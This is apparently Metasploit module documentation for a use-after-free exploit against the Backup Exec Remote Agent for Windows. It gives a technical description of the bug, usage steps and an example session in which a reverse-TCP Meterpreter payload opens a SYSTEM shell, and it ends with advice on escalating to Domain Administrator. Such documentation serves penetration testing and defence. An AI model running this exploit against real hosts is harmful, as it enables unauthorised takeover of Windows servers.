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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/backupexec/
Views: 1904

Vulnerability Summary

The Backup Exec Remote Agent for Windows is vulnerable to a use-after-free in its handling of SSL/TLS-wrapped NDMP connections. If SSL/TLS is established on a NDMP connection, ended, and finally re-established, the agent will re-use previously freed SSL/TLS structures. This allows for remote code execution over an unauthenticated network connection.

Vulnerable Application

Backup Exec consists of a server component as well as remote agents that are installed on each host that should be backed up by the server.

There are remote agents available for a range of data sources, including operating-system level agents for Windows and Linux hosts' local filesystems, application-specific agents for Microsoft Exchange, SharePoint, Active Directory, etc., and agents for virtual machines such as VMware or Hyper-V instances. This exploit targets the Windows OS-level remote agents, which are the most common type in a typical Backup Exec deployment on a Windows-based network. The agents are installed as services running by default as the NT AUTHORITY\SYSTEM user.

A trial version of Backup Exec can be downloaded from Veritas' website; currently the download is available here.

Vulnerability Description

The agent accepts NDMP connections on TCP port 10000. The vendor-specific 0xF383 NDMP packet type allows for NDMP connections to be wrapped in a SSL/TLS session. Sub-type 4 initiates the SSL/TLS handshake; after successfully completing this the client and server continue the NDMP session through the SSL/TLS session.

The agent makes use of OpenSSL to handle these SSL/TLS sessions. When a SSL/TLS session is created, the agent creates necessary OpenSSL structures, including a struct BIO from the connection's associated network socket using BIO_new_socket. Upon the end of the SSL/TLS session, this structure is freed by a call to BIO_free through a call to SSL_free.

However, if a SSL/TLS connection is then re-established on the same NDMP connection, the previously freed BIO is re-used in the new SSL/TLS session even though it is no longer allocated. The BIO is stored during the first connection setup and then retrieved during second connection setup as a member of the CSecuritySSLConnection class, despite the call to SSL_free previously freeing it. This leads to a use-after-free as the BIO contains a pointer to a structure (BIO_METHOD *method) of function pointers that are used to perform operations such as reading and writing from the wrapped BIO object (in this case, the network socket).

By overwriting the previously allocated BIO with controlled data, it is possible to gain remote code execution when OpenSSL attempts to call one of these function pointers.

Verification Steps

  1. Install the Backup Exec server on a host.

  2. Install the Backup Exec Remote Agent for Windows on another host, either manually or through the server's remote agent installation feature. Note that in this contrived test situation you should be sure to let the agent run for a few minutes before continuing so it can finish initial startup work that otherwise interferes with the exploit's heap manipulation.

  3. Start msfconsole.

  4. Select the module and configure it with, at minimum, the address of the host running the remote agent:

    use exploit/windows/backupexec/ssl_uaf set RHOST [REMOTE AGENT HOST]
  5. Check the service is running and potentially vulnerable with the check command.

  6. Select a target version using set target [TARGET].

  7. Select a payload and its options; for example:

    set payload windows/x64/meterpreter/reverse_tcp set LHOST [METASPLOIT HOST]
  8. Start the exploit using the exploit command.

  9. Hopefully get a NT AUTHORITY\SYSTEM shell 😃

An example session is as follows:

msf > use exploit/windows/backupexec/ssl_uaf msf exploit(ssl_uaf) > set RHOST win10 RHOST => win10 msf exploit(ssl_uaf) > check Hostname: WIN10 OS type: Windows NT OS version: Major Version=10 Minor Version=0 Build Number=14393 ServicePack Major=0 ServicePack Minor=0 SuiteMask=256 ProductType=1 ProcessorType=AMD64 Host ID: XXXX::XXXX:XXXX:XXXX:XXXX Vendor: VERITAS Software, Corp. Product: Remote Agent for NT Revision: 9.2 [*] win10:10000 The target appears to be vulnerable. msf exploit(ssl_uaf) > show targets Exploit targets: Id Name -- ---- 0 Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x64 1 Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x86 2 Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x64 3 Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x86 4 Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x64 5 Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x86 6 Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x64 7 Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x86 8 Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x64 9 Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x86 10 Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64 11 Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86 msf exploit(ssl_uaf) > set target 4 target => 4 msf exploit(ssl_uaf) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(ssl_uaf) > set LHOST LHOST => msf exploit(ssl_uaf) > exploit [*] Started reverse TCP handler on [*] win10:10000 - Connecting sockets... [*] win10:10000 - CA certificate ID = 8120a0e9 [*] win10:10000 - Getting and handling a certificate signing request... [*] win10:10000 - Agent certificate ID = 430b56d0 [*] win10:10000 - Testing certificate... [*] win10:10000 - Spraying TLS extensions... [*] win10:10000 - Entering SSL mode on main socket... [*] win10:10000 - Spraying TLS extensions... [*] win10:10000 - Sending stages 2 to 4... [*] win10:10000 - Closing TLS spray sockets... [*] win10:10000 - Re-entering SSL mode on main socket... [*] win10:10000 - Spraying stage 1... [*] win10:10000 - Triggering UAF, attempt 1/50... [*] Sending stage (1189423 bytes) to [*] win10:10000 - Spraying stage 1... [*] win10:10000 - Triggering UAF, attempt 2/50... [*] Meterpreter session 1 opened ( -> at 2017-05-23 21:53:07 +1200 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM


Apart from the usual exploit module options such as RHOST, the module has a few exploit-specific options. These should not normally need to be set or changed from their default values in most situations as the exploit will pick suitable values for them depending on the target selected.

NumSpraySockets The number of sockets connected to the remote agent in order to spray stage 1 of the exploit, which should overwrite the freed BIO.

NumTLSSpraySockets The number of sockets connected to the remote agent in order to spray TLS extensions. This is used to massage the low fragmentation heap in order to increase chances of stage 1 successfully overwriting the freed BIO.

NumTriggerAttempts The number of attempts made to trigger the use-after-free for Windows 8+ targets, where it is possible to retry calling the overwritten function pointer multiple times.


The Backup Exec Remote Agent for Windows is installed on each host that has local filesystems that should be backed up. These agents listen on the network for NDMP connections (on port 10000), appearing in Nmap scans with scripts enabled as follows:

Starting Nmap 7.40 ( ) at 2017-05-23 20:47 NZST Nmap scan report for (...) Host is up (0.0035s latency). Not shown: 994 filtered ports PORT STATE SERVICE VERSION (...) 10000/tcp open ndmp Symantec/Veritas Backup Exec ndmp (NDMPv3) |_ndmp-version: ERROR: Script execution failed (use -d to debug)

(Note that the ndmp-version script fails to execute due to not sending an NDMP_CONNECT_OPEN request before querying version information with the NDMP_CONFIG_GET_HOST_INFO request. This exploit module's check command will carry this query out successfully.)

While the exploit is not guaranteed to gain RCE (see the module's description), in practise the agent is often widely installed in a Windows domain across a range of hosts (including fileservers and domain controllers). This means usually at least one instance of the agent will give a shell on a server where it's easy enough to further escalate to Domain Administrator from SYSTEM.